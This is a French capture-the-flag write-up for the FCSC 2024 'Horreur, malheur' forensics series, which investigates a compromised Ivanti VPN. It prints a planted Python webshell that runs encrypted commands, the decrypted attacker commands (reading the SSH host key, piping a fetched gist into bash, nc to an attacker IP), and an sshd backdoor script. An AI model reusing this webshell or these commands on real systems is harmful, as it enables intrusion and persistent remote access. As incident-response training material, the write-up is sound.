# Horreur, malheur

## Introduction commune à la série Horreur, malheur

Vous venez d'être embauché en tant que Responsable de la Sécurité des Systèmes d'Information (RSSI) d'une entreprise stratégique.

En arrivant à votre bureau le premier jour, vous vous rendez compte que votre prédécesseur vous a laissé une clé USB avec une note dessus : VPN compromis (intégrité). Version 22.3R1 b1647.

Note : La première partie (Archive chiffrée) débloque les autres parties, à l'exception de la seconde partie (Accès initial) qui peut être traitée indépendamment. Nous vous recommandons de traiter les parties dans l'ordre.

## Horreur, malheur 1/5 - Archive chiffrée

**Description**

Sur la clé USB, vous trouvez deux fichiers : une archive chiffrée et les journaux de l'équipement. Vous commencez par lister le contenu de l'archive, dont vous ne connaissez pas le mot de passe. Vous gardez en tête un article que vous avez lu : il paraît que les paquets installés sur l'équipement ne sont pas à jour...

Le flag est le mot de passe de l'archive.

**Remarque** : Le mot de passe est long et aléatoire, inutile de chercher à le *bruteforcer*.

Fichier: [archive.encrypted](https://hackropole.fr/challenges/fcsc2024-forensics-horreur-malheur/public/archive.encrypted)


**Solution**

On regarde un peu la tête de l'archive fournie.

```
$ unzip -t archive.encrypted
Archive:  archive.encrypted
[archive.encrypted] tmp/temp-scanner-archive-20240315-065846.tgz password: 
   skipping: tmp/temp-scanner-archive-20240315-065846.tgz  incorrect password
   skipping: home/VERSION            incorrect password
   skipping: data/flag.txt           incorrect password
Caution:  zero files tested in archive.encrypted.
3 files skipped because of incorrect password.
```

Rien qui saute aux yeux, à part le flag évidemment. On remonte à l'énoncé, et une rapide
recherche sur la version `22.3R1 b1647` montre une référence à [Ivanti](https://www.assetnote.io/resources/research/high-signal-detection-and-exploitation-of-ivantis-pulse-connect-secure-auth-bypass-rce). 
Vu l'actualité, on devrait s'amuser. ;-)

Intéressant, le billet nous donne le contenu de /home/VERSION :
```
export DSREL_MAJOR=22
export DSREL_MINOR=3
export DSREL_MAINT=1
export DSREL_DATAVER=4802
export DSREL_PRODUCT=ssl-vpn
export DSREL_DEPS=ive
export DSREL_BUILDNUM=1647
export DSREL_COMMENT="R1"

```

Étant donné qu'on a le texte clair de l'un des fichiers de l'archive, on est dans le cas d'usage
de [pkcrack](https://github.com/keyunluo/pkcrack). En réalité, je vais avoir quelques essais infructueux, 
notamment à cause du manque d'un retour chariot final dans le fichier `VERSION`.

Un autre critère important pour réussir est de générer la deuxième archive ZIP avec le même
logiciel que celui pour l'archive chiffrée. D'où l'autre indice de l'énoncé précisant que les paquets
ne sont pas à jour. Une petite recherche pointe vers [ceci](https://eclypsium.com/blog/flatlined-analyzing-pulse-secure-firmware-and-bypassing-integrity-checking/) :

> This is probably a good time to point out what base operating system Ivanti is using: CentOS 6.4; which was released in 2013 and officially end of life in 2020

Du coup, j'ai récupéré un Live CD de CentOs 6.3 pour zipper le clair connu (je me rends compte en
rédigeant cette solution que c'était la 6.4 qu'il fallait... mais ça a marché, alors...).

```
$ /opt/pkcrack/bin/pkcrack -C archive.encrypted -c "home/VERSION" -P ./comparatif.zip -p version -d decrypted.zip -a
Files read. Starting stage 1 on Sun Apr  7 12:56:04 2024
Generating 1st generation of possible key2_119 values...done.
Found 4194304 possible key2-values.
Now we're trying to reduce these...
Done. Left with 79793 possible Values. bestOffset is 24.
Stage 1 completed. Starting stage 2 on Sun Apr  7 12:56:09 2024
Ta-daaaaa! key0=6ed5a98a, key1=a1bb2e0e, key2=c9172a2f
Probabilistic test succeeded for 100 bytes.
Strange... had a false hit.
Strange... had a false hit.
Strange... had a false hit.
Stage 2 completed. Starting zipdecrypt on Sun Apr  7 13:00:12 2024
Decrypting tmp/temp-scanner-archive-20240315-065846.tgz (ebbb2d528a1df26cd1e65737)... OK!
Decrypting home/VERSION (5679cee2b9f4e448a012c538)... OK!
Decrypting data/flag.txt (548ddd288bde17b3878c1334)... OK!
Finished on Sun Apr  7 13:00:12 2024
$ cat data/flag.txt 
50c53be3eece1dd551bebffe0dd5535c
```

Le flag est donc `FCSC{50c53be3eece1dd551bebffe0dd5535c}`.

## Horreur, malheur 2/5 - Accès initial 

**Description**

Sur la clé USB, vous trouvez deux fichiers : une archive chiffrée et les journaux de l'équipement. Vous focalisez maintenant votre attention sur les journaux. L'équipement étant compromis, vous devez retrouver la vulnérabilité utilisée par l'attaquant ainsi que l'adresse IP de ce dernier.

Le flag est au format : `FCSC{CVE-XXXX-XXXXX:<adresse_IP>}`.

Fichier: [horreur-malheur.tar.xz](https://hackropole.fr/challenges/fcsc2024-forensics-horreur-malheur/public/horreur-malheur.tar.xz)


**Solution**

On jette un œil aux logs de l'équipement : 
```
$ tar tJvf horreur-malheur.tar.xz 
drwxr-xr-x fcsc2024/fcsc2024 0 1970-01-01 00:00 data/
drwxr-xr-x fcsc2024/fcsc2024 0 1970-01-01 00:00 data/var/
drwxr-xr-x fcsc2024/fcsc2024 0 1970-01-01 00:00 data/var/dlogs/
-rw-r--r-- fcsc2024/fcsc2024 1522 1970-01-01 00:00 data/var/dlogs/esapdata_rest_server.log.old
-rw-r--r-- fcsc2024/fcsc2024 28203108 1970-01-01 00:00 data/var/dlogs/debuglog.old
-rw-r--r-- fcsc2024/fcsc2024     1854 1970-01-01 00:00 data/var/dlogs/config_rest_server.log.old
-rw-r--r-- fcsc2024/fcsc2024   210956 1970-01-01 00:00 data/var/dlogs/debuglog
-rw-r--r-- fcsc2024/fcsc2024      210 1970-01-01 00:00 data/var/dlogs/user_import_debuglog
-rw-r--r-- fcsc2024/fcsc2024  1133915 1970-01-01 00:00 data/var/dlogs/nodemonlog.old
-rw-r--r-- fcsc2024/fcsc2024     1698 1970-01-01 00:00 data/var/dlogs/gwpolicy_rest_server.log
-rw-r--r-- fcsc2024/fcsc2024     1698 1970-01-01 00:00 data/var/dlogs/config_rest_server.log
-rw-r--r-- fcsc2024/fcsc2024  1210302 1970-01-01 00:00 data/var/dlogs/nodemonlog
-rw-r--r-- fcsc2024/fcsc2024 15635297 1970-01-01 00:00 data/var/dlogs/system_import_debuglog
-rw-r--r-- fcsc2024/fcsc2024     1698 1970-01-01 00:00 data/var/dlogs/session_rest_server.log
-rw-r--r-- fcsc2024/fcsc2024     1522 1970-01-01 00:00 data/var/dlogs/gwpolicy_rest_server.log.old
-rw-r--r-- fcsc2024/fcsc2024     1698 1970-01-01 00:00 data/var/dlogs/namedusersrestserver.log
-rw-r--r-- fcsc2024/fcsc2024     1522 1970-01-01 00:00 data/var/dlogs/tasks_rest_server.log.old
-rw-r--r-- fcsc2024/fcsc2024     1698 1970-01-01 00:00 data/var/dlogs/tasks_rest_server.log
-rw-r--r-- fcsc2024/fcsc2024     1698 1970-01-01 00:00 data/var/dlogs/aaaservices_rest_server.log
-rw-r--r-- fcsc2024/fcsc2024     1699 1970-01-01 00:00 data/var/dlogs/custom_actions_rest_server.log
-rw-r--r-- fcsc2024/fcsc2024     1524 1970-01-01 00:00 data/var/dlogs/custom_actions_rest_server.log.old
-rw-r--r-- fcsc2024/fcsc2024     1522 1970-01-01 00:00 data/var/dlogs/aaaservices_rest_server.log.old
-rw-r--r-- fcsc2024/fcsc2024     1522 1970-01-01 00:00 data/var/dlogs/enduserportal_rest_server.log.old
-rw-r--r-- fcsc2024/fcsc2024     1568 1970-01-01 00:00 data/var/dlogs/namedusersrestserver.log.old
-rw-r--r-- fcsc2024/fcsc2024     2958 1970-01-01 00:00 data/var/dlogs/ueba_webserv.log
-rw-r--r-- fcsc2024/fcsc2024 17404787 1970-01-01 00:00 data/var/dlogs/cav_webserv.log
-rw-r--r-- fcsc2024/fcsc2024     3080 1970-01-01 00:00 data/var/dlogs/monrestserver.log
-rw-r--r-- fcsc2024/fcsc2024     1698 1970-01-01 00:00 data/var/dlogs/esapdata_rest_server.log
-rw-r--r-- fcsc2024/fcsc2024 24600541 1970-01-01 00:00 data/var/dlogs/cav_webserv.log.old
-rw-r--r-- fcsc2024/fcsc2024     1698 1970-01-01 00:00 data/var/dlogs/enduserportal_rest_server.log
```

Bon, des logs donc... Que doit-on chercher ? Renseignons-nous sur les vulnérabilités Ivanti.
Une bonne introduction est fournie par [cet article de Rapid7](https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis).
On cherche également quelques exploits publiés et voir si on trouve des choses qui ressemblent dans les logs.
- CVE-2024-21893 : rien dans les logs.
- CVE-2024-21888 : rien dans les logs.
- CVE-2024-21887 : [ici](https://github.com/Chocapikk/CVE-2024-21887/blob/main/exploit.py) et [là](https://github.com/imhunterand/CVE-2024-21887/blob/main/CVE202421887.py), la vulnérabilité semble liée au endpoint `/api/v1/totp/user-backup-code`.

On grep `totp` pour voir:
```
data/var/dlogs/config_rest_server.log.old:[pid: 6299|app: 0|req: 1/1] 172.18.0.4 () {30 vars in 501 bytes} [Fri Mar 15 06:29:17 2024] POST /api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection => generated 14 bytes in 164281 msecs (HTTP/1.1 200) 2 headers in 71 bytes (1 switches on core 0)
```

Et on a une adresse IP en plus ! Mais ça ne valide pas avec le flag `FCSC{CVE-2024-21887:172.18.0.4}`. Un grand classique
dans ce genre de logs est que l'adresse présentée est celle du reverse-proxy. Et ça se confirme dans le log `data/var/dlogs/nodemonlog`.
Ce log nous indique aussi qu'il existe des connexions de la même IP extérieure depuis un shell, on a donc bien notre attaquant !
```
web        6264     root   23u     IPv6            1707721       0t0        TCP 172.18.0.4:https->20.13.3.0:55102 (ESTABLISHED)
web        6264     root   29u     IPv4            1707724       0t0        TCP 172.18.0.4:55889->127.0.0.1:8090 (ESTABLISHED)
sh        21972     root    0u     IPv4            1465043       0t0        TCP 172.18.0.4:13606->20.13.3.0:krb524 (ESTABLISHED)
sh        21972     root    1u     IPv4            1465043       0t0        TCP 172.18.0.4:13606->20.13.3.0:krb524 (ESTABLISHED)
sh        21972     root    2u     IPv4            1465043       0t0        TCP 172.18.0.4:13606->20.13.3.0:krb524 (ESTABLISHED)
sh        21972     root  255u     IPv4            1465043       0t0        TCP 172.18.0.4:13606->20.13.3.0:krb524 (ESTABLISHED)
```
Le flag est `FCSC{CVE-2024-21887:20.13.3.0}`.

## Horreur, malheur 3/5 - Simple persistance

**Description**

Vous avez réussi à déchiffrer l’archive. Il semblerait qu’il y ait dans cette archive une autre archive, qui contient le résultat du script de vérification d’intégrité de l’équipement.

À l’aide de cette dernière archive et des journaux, vous cherchez maintenant les traces d’une persistance déposée et utilisée par l’attaquant.

**Solution**

On revient donc à l'archive chiffrée de la première étape et on regarde le fichier qui ne nous a pas encore servi.

```
$ tar xzvf temp-scanner-archive-20240315-065846.tgz 
home/bin/configencrypt
home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg
```

Le premier script:

```python
#!/usr/bin/env python
import os
import subprocess
import sys

if len(sys.argv) == 3 and os.path.basename(sys.argv[2]).startswith("pulsesecure-state-"):
    with open("/data/flag.txt", "r") as handle:
        flag = handle.read().replace("\n","")
    flag = "FCSC{" + flag + "}"
    infile = sys.argv[1]
    outfile = sys.argv[2]
    command = "zip -P "+flag+" "+outfile+" "+infile+" "+"/home/VERSION" + " /data/flag.txt"
    os.system(command)
else:
    subprocess.Popen(["/home/bin/configencrypt.bak"] + sys.argv[1:])
```

C'est le script qui a créé l'archive. Il est déclenché seulement sur une certaine valeur de paramètre, 
sinon c'est le script d'origine qui est appelé. 

Le deuxième fichier est un `.egg`, en fait une archive zip de scripts python. On décompresse et on
cherche quelques patterns, et `flag` matche sur le script `health.py` :

```python
#
# Copyright (c) 2018 by Pulse Secure, LLC. All rights reserved
#
import base64
import subprocess
import zlib
import simplejson as json
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import pad, unpad
from flask import request
from flask_restful import Resource


class Health(Resource):
    """
    Handles requests that are coming for client to post the application data.
    """

    def get(self):
        try:
            with open("/data/flag.txt", "r") as handle:
                dskey = handle.read().replace("\n", "")
            data = request.args.get("cmd")
            if data:
                aes = AES.new(dskey.encode(), AES.MODE_ECB)
                cmd = zlib.decompress(aes.decrypt(base64.b64decode(data)))
                result = subprocess.getoutput(cmd)
                if not isinstance(result, bytes): result = str(result).encode()
                result = base64.b64encode(aes.encrypt(pad(zlib.compress(result), 32))).decode()        
                return result, 200
        except Exception as e:
            return str(e), 501
```

Un joli canal de communication chiffré ! Le script est déclenché par des appels à l'URL `/api/v1/cav/client/health`. 
On regarde les logs :
```
$ grep -r "health?cmd=" data/var/dlogs/cav_webserv.log
[pid: 22151|app: 0|req: 15645/24114] 172.18.0.4 () {32 vars in 557 bytes} [Fri Mar 15 06:36:24 2024] GET /api/v1/cav/client/health?cmd=DjrB3j2wy3YJHqXccjkWidUBniQPmhTkHeiA59kIzfA%3D => generated 47 bytes in 83 msecs (HTTP/1.1 200) 2 headers in 71 bytes (3 switches on core 998)
[pid: 22151|app: 0|req: 15957/24535] 172.18.0.4 () {32 vars in 557 bytes} [Fri Mar 15 06:36:27 2024] GET /api/v1/cav/client/health?cmd=K/a6JKeclFNFwnqrFW/6ENBiq0BnskUVoqBf4zn3vyQ%3D => generated 175 bytes in 74 msecs (HTTP/1.1 200) 2 headers in 72 bytes (3 switches on core 998)
[pid: 22151|app: 0|req: 16618/25571] 172.18.0.4 () {32 vars in 649 bytes} [Fri Mar 15 06:36:36 2024] GET /api/v1/cav/client/health?cmd=/ppF2z0iUCf0EHGFPBpFW6pWT4v/neJ6wP6dERUuBM/6CAV2hl/l4o7KqS7TvTZAWDVxqTd6EansrCTOAnAwdQ%3D%3D => generated 91 bytes in 74 msecs (HTTP/1.1 200) 2 headers in 71 bytes (3 switches on core 997)
[pid: 22150|app: 0|req: 9307/26659] 172.18.0.4 () {32 vars in 649 bytes} [Fri Mar 15 06:36:44 2024] GET /api/v1/cav/client/health?cmd=Lmrbj2rb7SmCkLLIeBfUxTA2pkFQex/RjqoV2WSBr0EyxihrKLvkqPKO3I7KV1bhm8Y61VzkIj3tyLKLgfCdlA%3D%3D => generated 1755 bytes in 80 msecs (HTTP/1.1 200) 2 headers in 73 bytes (3 switches on core 999)
[pid: 22150|app: 0|req: 9690/27957] 172.18.0.4 () {32 vars in 821 bytes} [Fri Mar 15 06:36:54 2024] GET /api/v1/cav/client/health?cmd=yPfHKFiBi6MxfKlndP99J4eco1zxfKUhriwlanMWKE3NhhHtYkSOrj4QZhvf6u17fJ%2B74TvmsMdtYH6pnvcNZOq3JRu2hdv2Za51x82UYXG1WpYtAgCa42dOx/deHzAlZNwM7VvCZckPLfDeBGZyLHX/XP4spz4lpfau9mZZ%2B/o%3D => generated 47 bytes in 479 msecs (HTTP/1.1 200) 2 headers in 71 bytes (3 switches on core 998)
[pid: 22151|app: 0|req: 19876/30291] 172.18.0.4 () {32 vars in 725 bytes} [Fri Mar 15 06:37:13 2024] GET /api/v1/cav/client/health?cmd=E1Wi18Bo5mPNTp/CaB5o018KdRfH2yOnexhwSEuxKWBx7%2Byv4YdHT3ASGAL67ozaoZeUzaId88ImfFvaPeSr6XtPvRqgrLJPl7oH2GHafzEPPplWHDPQQUfxsYQjkbhT => generated 47 bytes in 76 msecs (HTTP/1.1 200) 2 headers in 71 bytes (3 switches on core 997)
[pid: 22151|app: 0|req: 21170/32168] 172.18.0.4 () {32 vars in 825 bytes} [Fri Mar 15 06:37:28 2024] GET /api/v1/cav/client/health?cmd=7JPshdVsmVSiQWcRNKLjY1FkPBh91d2K3SUK7HrBcEJu/XbfMG9gY/pTNtVhfVS7RXpWHjLOtW01JKfmiX/hOJQ8QbfXl2htqcppn%2BXeiWHpCWr%2ByyabDservMnHxrocU4uIzWNXHef5VNVClGgV4JCjjI1lofHyrGtBD%2B0nZc8%3D => generated 47 bytes in 353 msecs (HTTP/1.1 200) 2 headers in 71 bytes (3 switches on core 997)
[pid: 22150|app: 0|req: 13730/40274] 172.18.0.4 () {32 vars in 653 bytes} [Fri Mar 15 06:37:41 2024] GET /api/v1/cav/client/health?cmd=WzAd4Ok8kSOF8e1eS6f8rdGE4sH5Ql8injexw36evBw/mHk617VRAtzEhjXwOZyR/tlQ20sgz%2BJxmwQdxnJwNg%3D%3D => generated 47 bytes in 53732 msecs (HTTP/1.1 200) 2 headers in 71 bytes (3 switches on core 997)
[pid: 22151|app: 0|req: 28123/42351] 172.18.0.4 () {32 vars in 557 bytes} [Fri Mar 15 06:38:51 2024] GET /api/v1/cav/client/health?cmd=G9QtDIGXyoCA6tZC6DtLz89k5FDdQNe2TfjZ18hdPbM%3D => generated 47 bytes in 73 msecs (HTTP/1.1 200) 2 headers in 71 bytes (3 switches on core 999)
[pid: 22151|app: 0|req: 29153/43658] 172.18.0.4 () {32 vars in 565 bytes} [Fri Mar 15 06:39:01 2024] GET /api/v1/cav/client/health?cmd=QV2ImqgrjrL7%2BtofpO12S9bqgDCRHYXGJwaOIihb%2BNI%3D => generated 91 bytes in 72 msecs (HTTP/1.1 200) 2 headers in 71 bytes (3 switches on core 999)
```

Effectivement, on trouve un dialogue. On a le script qui déchiffre, et on connaît la clef depuis l'étape 1. On scripte le [decodage](decode.py):

```
0: id
1: ls /
2: echo FCSC{6cd63919125687a10d32c4c8dd87a5d0c8815409}
3: cat /data/runtime/etc/ssh/ssh_host_rsa_key
4: /home/bin/curl -k -s https://api.github.com/repos/joke-finished/2e18773e7735910db0e1ad9fc2a100a4/commits?per_page=50 -o /tmp/a
5: cat /tmp/a | grep "name" | /pkg/uniq | cut -d ":" -f 2 | cut -d '"' -f 2 | tr -d '
' | grep -o . | tac | tr -d '
'  > /tmp/b
6: a=`cat /tmp/b`;b=${a:4:32};c="https://api.github.com/gists/${b}";/home/bin/curl -k -s ${c} | grep 'raw_url' | cut -d '"' -f 4 > /tmp/c
7: c=`cat /tmp/c`;/home/bin/curl -k ${c} -s | bash
8: rm /tmp/a /tmp/b /tmp/c
9: nc 146.0.228.66:1337
```

Le flag est donc `FCSC{6cd63919125687a10d32c4c8dd87a5d0c8815409}`.

## Horreur, malheur 4/5 - Pas si simple persistance

**Description**

Vous remarquez qu'une fonctionnalité built-in de votre équipement ne fonctionne plus et vous vous demandez si l'attaquant n'a pas utilisé la première persistance pour en installer une seconde, moins "visible"...

Vous cherchez les caractéristiques de cette seconde persistance : protocole utilisé, port utilisé, chemin vers le fichier de configuration qui a été modifié, chemin vers le fichier qui a été modifié afin d'établir la persistance.

Le flag est au format : `FCSC{<protocole>:<port>:<chemin_absolu>:<chemin_absolu>}`.


**Solution**

On examine la suite des commandes déchiffrées à l'étape précédente, après l'affichage du flag. 
En interprétant les commandes, on arrive à [ce gist](https://api.github.com/gists/f1b75ea202a92df5b9f151535b7f19fe),
puis [à ce fichier](https://gist.githubusercontent.com/joke-finished/f1b75ea202a92df5b9f151535b7f19fe/raw/ae0bca6e36064e1c810aa55960a6e30b94f64fca/gistfile1.txt) :

```
sed -i 's/port 830/port 1337/' /data/runtime/etc/ssh/sshd_server_config > /dev/null 2>&1
sed -i 's/ForceCommand/#ForceCommand/' /data/runtime/etc/ssh/sshd_server_config > /dev/null 2>&1
echo "PubkeyAuthentication yes" >> /data/runtime/etc/ssh/sshd_server_config
echo "AuthorizedKeysFile /data/runtime/etc/ssh/ssh_host_rsa_key.pub" >> /data/runtime/etc/ssh/sshd_server_config
pkill sshd-ive > /dev/null 2>&1
gzip -d /data/pkg/data-backup.tgz > /dev/null 2>&1
tar -rf /data/pkg/data-backup.tar /data/runtime/etc/ssh/sshd_server_config > /dev/null 2>&1
gzip /data/pkg/data-backup.tar > /dev/null 2>&1
mv /data/pkg/data-backup.tar.gz /data/pkg/data-backup.tgz > /dev/null 2>&1
```

On voir la modification du fichier de configuration du serveur OpenSSH. Ainsi :
- protocole: `ssh`
- port: `1337`
- fichier de configuration: `/data/runtime/etc/ssh/sshd_server_config`
La persistance est assurée par une modification du `data-backup.tgz`, probablement une sauvegarde qui sera utilisée en cas de problème.

Le flag est `FCSC{ssh:1337:/data/runtime/etc/ssh/sshd_server_config:/data/pkg/data-backup.tgz}`.


## Horreur, malheur 5/5 - Un peu de CTI

**Description**

Vous avez presque fini votre analyse ! Il ne vous reste plus qu'à qualifier l'adresse IP présente dans la dernière commande utilisée par l'attaquant.

Vous devez déterminer à quel groupe d'attaquant appartient cette adresse IP ainsi que l'interface de gestion légitime qui était exposée sur cette adresse IP au moment de l'attaque.

Le flag est au format : FCSC{<UNCXXXX>:<nom du service>}.

**Remarque** : Il s’agit d’une véritable adresse IP malveillante, **n’interagissez pas** directement avec cette adresse IP.

**Solution**

On parle de `146.0.228.66`, c'est l'adresse IP mentionnée dans la dernière ligne de l'échange avec le C2 déchiffré 
à l'étape 3. On fait quelque recherche Google, et cette IP est effectivement citée comme IOC dans les rapports des
compromission Ivanti. Par exemple, sur [ce site en russe](https://1275.ru/ioc/3035/unc5221-apt-iocs-part-2/), qui la lie à 
`UNC5221`. C'est confirmé dans [ce billet de Mandiant](https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation).

Ça, c'est la partie facile. La deuxième partie du flag a laissé beaucoup de gens perplexes. Qu'est-ce qu'une interface de gestion ? 
Un nom de service ? Je ne vous cache pas que j'ai crâmé quelques tentatives (heureusement le nombre d'essais est généreux sur les
forensics..). Mais voici la bonne réponse.

J'ai d'abord tenté des bases de données de passive DNS pour déterminer à qui était attribuée l'IP à l'époque de l'attaque.
Le résultat le plus intéressant est celui fournit par [whoisxml](https://dns-history.whoisxmlapi.com) : 

![](Passive%20DNS.png)

Le premier domaine attire l'œil. En effet, areekaweb.com est aussi un
IOC dans le rapport de Mandiant, et il était relié à cette adresse IP 
à l'époque.

En creusant ce domaine, on peut retrouver les différents enregistrements
DNS reliés, via [dnsdumpster](https://dnsdumpster.com/) : 

![](areekaweb.com.png)

On a deux FQDN liés à cette IP : blog et cms.areekaweb.com. On peut alors
creuser un peu plus loin, par ex. sur l'[Internet Archive](https://archive.org/).
On peut aussi les requêter, car depuis l'attaque, les adresses IP ont changé (on
peut supposer que les serveurs sous areekaweb.com ont été redéployé).

Ce qui m'a attiré l'œil (apès plusieurs essais de validation sans succès, quand même...),
c'est les headers de retour sur cms.areekaweb.com :

```shell
$ curl -v https://cms.areekaweb.com/Account/Login?returnUrl=/
[...]

< HTTP/2 200 
< cache-control: private
< content-type: text/html; charset=utf-8
< server: Microsoft-IIS/10.0
< x-aspnetmvc-version: 5.2
< x-frame-options: SAMEORIGIN
< set-cookie: __RequestVerificationToken=yzaV-NkYnaxUGkS1cM4v4kHTwcrDIDbZgbkaGocyvrTLKNt4_7HjZUJiPdVOPvjDPYspZwFa87bgKdJUXVbapifxok1wNMbzHtcd19_KV_81; path=/; HttpOnly
< x-powered-by-plesk: PleskWin
< x-frame-options: SAMEORIGIN
< x-content-type: nosniff
< x-content-type-options: nosniff
< x-xss-protection: 1; mode=block
< access-control-allow-headers: Content-Type
< access-control-allow-methods: GET,POST
< access-control-allow-credentials: true
* Illegal STS header skipped
< strict-transport-security: 1; mode=max-age=31536000; includeSubDomains; preload
< date: Mon, 08 Apr 2024 20:27:52 GMT
< content-length: 3525
```

Ce simple header `x-powered-by-plesk`, pourrait-il être la réponse ? Bien sûr, mais
c'est facile à dire après coup. D'ailleurs, en rédigeant cette solution, je me rends
compte que dnsdumpster, encore lui, donnait cette réponse avec l'IP `146.0.228.66` 
(quoique sans donner de dates, donc difficile de le prendre pour argent comptant):

![](dnsdumpster.png)

Voilà, le flag est donc `FCSC{UNC5221:plesk}`.